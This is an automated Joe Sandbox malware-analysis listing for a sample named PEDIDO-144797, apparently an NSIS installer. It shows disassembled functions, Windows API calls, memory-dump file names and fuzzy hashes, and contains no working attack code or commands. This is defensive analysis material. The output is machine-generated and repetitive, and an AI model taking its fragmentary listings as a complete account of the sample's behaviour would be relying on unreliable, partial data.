                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                          • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                                          • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                                                                                          • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                                          • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                                                                                          Function 00404BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                                          • wsprintfW.USER32 ref: 00404C7A
                                                                                                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                          • String ID: %u.%u%s%s$(7B
                                                                                                                                          • API String ID: 3540041739-1320723960
                                                                                                                                          • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                                          • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                                                                                          • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                                          • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                                                                                          Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp$C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll
                                                                                                                                          • API String ID: 3109718747-1120868966
                                                                                                                                          • Opcode ID: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                          • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                                                                                          • Opcode Fuzzy Hash: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
                                                                                                                                          • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                                                                                          Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                          Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                          • Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                          • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                                                                                          • Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                          • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                                                                                          Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                          • String ID: !
                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                          • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                          • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                                                                                          • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                          • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                                                                                          Function 00405C81 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                          • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                                                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                                                                                          • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                                                                                          Function 00405D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                            • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405D3A
                                                                                                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405DE2
                                                                                                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0), ref: 00405DF2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                          • String ID: 0_B
                                                                                                                                          • API String ID: 3248276644-2128305573
                                                                                                                                          • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                                          • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                                                                                          • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                                                                                          • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                                                                                          Function 00405388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • IsWindowVisible.USER32(?), ref: 004053B7
                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                                                                                            • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                          • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                                          • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                                                                                          • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                                                                                          • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                                                                                          Function 0040627E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                          • String ID: Call
                                                                                                                                          • API String ID: 3356406503-1824292864
                                                                                                                                          • Opcode ID: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                                                                                                          • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                                                                                          • Opcode Fuzzy Hash: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
                                                                                                                                          • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
